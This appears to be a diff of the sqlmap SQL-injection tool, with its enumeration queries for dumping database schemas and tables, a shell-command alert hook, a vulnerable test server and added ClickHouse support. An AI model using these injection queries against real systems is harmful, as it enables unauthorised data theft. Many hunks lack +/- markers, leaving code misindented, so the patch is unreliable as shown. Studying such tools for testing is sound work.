            <inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
            <blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
            <blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
        <search_table>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
        </search_table>
        <search_column>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
        </search_column>
        <search_db>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
            <blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
        </search_db>
    </dbms>
    <dbms value="CrateDB">
        <cast query="CAST(%s AS TEXT)"/>
        <length query="CHAR_LENGTH((%s)::text)"/>
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,3 +1,8 @@
 # Version 1.7 (2022-01-02)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
 * [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
 # Version 1.6 (2022-01-03)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
--- a/doc/translations/README-sk-SK.md
+++ b/doc/translations/README-sk-SK.md
@@ -0,0 +1,50 @@
 # sqlmap ![](https://i.imgur.com/fe85aVR.png)
 [![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení.
 Snímky obrazovky
 ----
 ![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki.
 Inštalácia
 ----
 Najnovší tarball si môžete stiahnuť kliknutím [sem](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo najnovší zipball kliknutím [sem](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Najlepšie je stiahnuť sqlmap naklonovaním [Git](https://github.com/sqlmapproject/sqlmap) repozitára:
    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
 Využitie
 ----
 Na získanie zoznamu základných možností a prepínačov, použite:
    python sqlmap.py -h
 Na získanie zoznamu všetkých možností a prepínačov, použite:
    python sqlmap.py -hh
 Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
 Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
 Linky
 ----
 * Domovská stránka: https://sqlmap.org
 * Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
 * Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
 * Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
 * Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-tr-TR.md
+++ b/doc/translations/README-tr-TR.md
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
 Kullanım
 ----
--- a/extra/init.py
+++ b/extra/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/beep/init.py
+++ b/extra/beep/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/cloak/init.py
+++ b/extra/cloak/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
 """
 cloak.py - Simple file encryption/compression utility
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
    xrange = range
    ord = lambda _: _
-KEY = b"ENWsCymUeJcXqSbD"
+KEY = b"E6wRbVhD0IBeCiGJ"
 def xor(message, key):
    return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
--- a/extra/dbgtool/init.py
+++ b/extra/dbgtool/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/icmpsh/icmpsh.exe_
+++ b/extra/icmpsh/icmpsh.exe_
--- a/extra/runcmd/runcmd.exe_
+++ b/extra/runcmd/runcmd.exe_
--- a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
+++ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
--- a/extra/shutils/blanks.sh
+++ b/extra/shutils/blanks.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Removes trailing spaces from blank lines inside project files
--- a/extra/shutils/drei.sh
+++ b/extra/shutils/drei.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Stress test against Python3
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Removes duplicate entries in wordlist like files
--- a/extra/shutils/junk.sh
+++ b/extra/shutils/junk.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
--- a/extra/shutils/modernize.sh
+++ b/extra/shutils/modernize.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # sudo pip install modernize
--- a/extra/shutils/pycodestyle.sh
+++ b/extra/shutils/pycodestyle.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
--- a/extra/shutils/pydiatra.sh
+++ b/extra/shutils/pydiatra.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Runs py3diatra on all python files (prerequisite: pip install pydiatra)
--- a/extra/shutils/pyflakes.sh
+++ b/extra/shutils/pyflakes.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
--- a/extra/shutils/pylint.sh
+++ b/extra/shutils/pylint.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
-# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 # See the file 'LICENSE' for copying permission
 find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;
--- a/extra/shutils/pypi.sh
+++ b/extra/shutils/pypi.sh
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/vulnserver/init.py
+++ b/extra/vulnserver/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -3,7 +3,7 @@
 """
 vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -44,7 +44,8 @@ SCHEMA = """
    CREATE TABLE users (
        id INTEGER,
        name TEXT,
-        surname TEXT
+        surname TEXT,
        PRIMARY KEY (id)
    );
    INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
    INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
--- a/lib/init.py
+++ b/lib/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/controller/init.py
+++ b/lib/controller/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -10,7 +10,6 @@ import logging
 import random
 import re
 import socket
 import subprocess
 import time
 from extra.beep.beep import beep
@@ -218,6 +217,7 @@ def checkSqlInjection(place, parameter, value):
                        if _ > 1:
                            __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
                            unionExtended = True
                            test.request._columns = test.request.columns
                            test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
                            title = re.sub(r"\b%d\b" % _, str(__), title)
                            test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
@@ -783,23 +783,9 @@ def checkSqlInjection(place, parameter, value):
                        injection.conf.regexp = conf.regexp
                        injection.conf.optimize = conf.optimize
                        if not kb.alerted:
                        if conf.beep:
                            beep()
                            if conf.alert:
                                infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
                                logger.info(infoMsg)
                                try:
                                    process = subprocess.Popen(conf.alert, shell=True)
                                    process.wait()
                                except Exception as ex:
                                    errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
                                    logger.error(errMsg)
                            kb.alerted = True
                        # There is no need to perform this test for other
                        # <where> tags
                        break
@@ -834,6 +820,9 @@ def checkSqlInjection(place, parameter, value):
                    choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
                conf.verbose = int(choice)
                setVerbosity()
                if hasattr(test.request, "columns") and hasattr(test.request, "_columns"):
                    test.request.columns = test.request._columns
                    delattr(test.request, "_columns")
                tests.insert(0, test)
            elif choice == 'N':
                return None
@@ -859,10 +848,8 @@ def checkSqlInjection(place, parameter, value):
        if not checkFalsePositives(injection):
            if conf.hostname in kb.vulnHosts:
                kb.vulnHosts.remove(conf.hostname)
            if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes:
                injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE)
    else:
        injection = None
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -9,6 +9,7 @@ from __future__ import division
 import os
 import re
 import subprocess
 import time
 from lib.controller.action import action
@@ -511,6 +512,23 @@ def start():
                        testSqlInj = True
                        paramKey = (conf.hostname, conf.path, place, parameter)
                        if kb.processUserMarks:
                            if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
                                if kb.processNonCustom is None:
                                    message = "other non-custom parameters found. "
                                    message += "Do you want to process them too? [Y/n/q] "
                                    choice = readInput(message, default='Y').upper()
                                    if choice == 'Q':
                                        raise SqlmapUserQuitException
                                    else:
                                        kb.processNonCustom = choice == 'Y'
                                if not kb.processNonCustom:
                                    infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
                                    logger.info(infoMsg)
                                    continue
                        if paramKey in kb.testedParams:
                            testSqlInj = False
@@ -532,7 +550,7 @@ def start():
                            infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
                            logger.info(infoMsg)
-                        elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)):
+                        elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I) or re.search(conf.paramExclude, place, re.I)):
                            testSqlInj = False
                            infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
@@ -598,6 +616,19 @@ def start():
                                        kb.injections.append(injection)
                                        if not kb.alerted:
                                            if conf.alert:
                                                infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
                                                logger.info(infoMsg)
                                                try:
                                                    process = subprocess.Popen(conf.alert, shell=True)
                                                    process.wait()
                                                except Exception as ex:
                                                    errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex))
                                                    logger.error(errMsg)
                                            kb.alerted = True
                                        # In case when user wants to end detection phase (Ctrl+C)
                                        if not proceed:
                                            break
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -14,6 +14,7 @@ from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import ALTIBASE_ALIASES
 from lib.core.settings import CACHE_ALIASES
 from lib.core.settings import CLICKHOUSE_ALIASES
 from lib.core.settings import CRATEDB_ALIASES
 from lib.core.settings import CUBRID_ALIASES
 from lib.core.settings import DB2_ALIASES
@@ -46,6 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn
 from plugins.dbms.altibase import AltibaseMap
 from plugins.dbms.cache.connector import Connector as CacheConn
 from plugins.dbms.cache import CacheMap
 from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
 from plugins.dbms.clickhouse import ClickHouseMap
 from plugins.dbms.cratedb.connector import Connector as CrateDBConn
 from plugins.dbms.cratedb import CrateDBMap
 from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -122,6 +125,7 @@ def setHandler():
        (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
        (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
        (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
        (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
        (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
        (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
        (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
--- a/lib/core/init.py
+++ b/lib/core/init.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -45,6 +45,7 @@ from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BOUNDED_BASE64_MARKER
 from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
 from lib.core.settings import BOUNDED_INJECTION_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import GENERIC_SQL_COMMENT
@@ -185,6 +186,11 @@ class Agent(object):
                newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
                newValue = self.adjustLateValues(newValue)
            # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5488
            if kb.customInjectionMark in origValue:
                payload = newValue.replace(origValue, "")
                newValue = origValue.replace(kb.customInjectionMark, payload)
            # TODO: support for POST_HINT
            newValue = "%s%s%s" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER)
@@ -222,7 +228,8 @@ class Agent(object):
            def _(pattern, repl, string):
                retVal = string
                match = None
-                for match in re.finditer(pattern, string):
+
                for match in re.finditer(pattern, string or ""):
                    pass
                if match:
@@ -489,7 +496,7 @@ class Agent(object):
        if field and Backend.getIdentifiedDbms():
            rootQuery = queries[Backend.getIdentifiedDbms()]
-            if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast:
+            if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL):
                nulledCastedField = field
            else:
                if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):
@@ -596,6 +603,9 @@ class Agent(object):
        if not _:
            fieldsSelectFrom = None
        if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I):
            fieldsMinMaxstr = None
        fieldsToCastStr = fieldsNoSelect
        if fieldsSubstr:
@@ -881,11 +891,16 @@ class Agent(object):
            if element > 0:
                unionQuery += ','
-            if element == position:
+            if conf.uValues:
                unionQuery += conf.uValues.split(',')[element]
            elif element == position:
                unionQuery += query
            else:
                unionQuery += char
        if conf.uValues:
            unionQuery = unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query)
        if fromTable and not unionQuery.endswith(fromTable):
            unionQuery += fromTable
@@ -1024,8 +1039,8 @@ class Agent(object):
            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
            limitedQuery += " %s" % limitStr
-        elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
+        elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB, DBMS.CLICKHOUSE):
-            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
+            limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
            limitedQuery += " %s" % limitStr
        elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 """
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
@@ -1034,7 +1034,10 @@ def dataToStdout(data, forceOutput=False, bold=False, contentType=None, status=C
            except UnicodeEncodeError:
                sys.stdout.write(re.sub(r"[^ -~]", '?', clearColors(data)))
            finally:
                try:
                    sys.stdout.flush()
                except IOError:
                    raise SystemExit
            if multiThreadMode:
                logging._releaseLock()
@@ -1766,7 +1769,7 @@ def parseTargetUrl():
        errMsg = "invalid target URL port (%d)" % conf.port
        raise SqlmapSyntaxException(errMsg)
-    conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
+    conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path))
    conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
    if urlSplit.query:
@@ -1819,7 +1822,7 @@ def expandAsteriskForColumns(expression):
    the SQL query string (expression)
    """
-    match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+((`[^`]+`|[^\s]+)+)", expression)
+    match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+(([`'\"][^`'\"]+[`'\"]|[\w.]+)+)(\s|\Z)", expression)
    if match:
        infoMsg = "you did not provide the fields in your query. "
@@ -3179,7 +3182,14 @@ def isNumPosStrValue(value):
    False
    """
-    return ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
+    retVal = False
    try:
        retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
    except ValueError:
        pass
    return retVal
@cachedmethod
 def aliasToDbmsEnum(dbms):
@@ -3399,19 +3409,39 @@ def parseSqliteTableSchema(value):
    >>> kb.data.cachedColumns = {}
    >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);")
    True
-    >>> repr(kb.data.cachedColumns).count(',') == 1
+    >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT'))
    True
    >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)");
    True
    >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT'))
    True
    >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);");
    True
    >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT'))
    True
    >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);");
    True
    >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER'))
    True
    """
    retVal = False
    value = extractRegexResult(r"(?s)\((?P<result>.+)\)", value)
    if value:
        table = {}
-        columns = {}
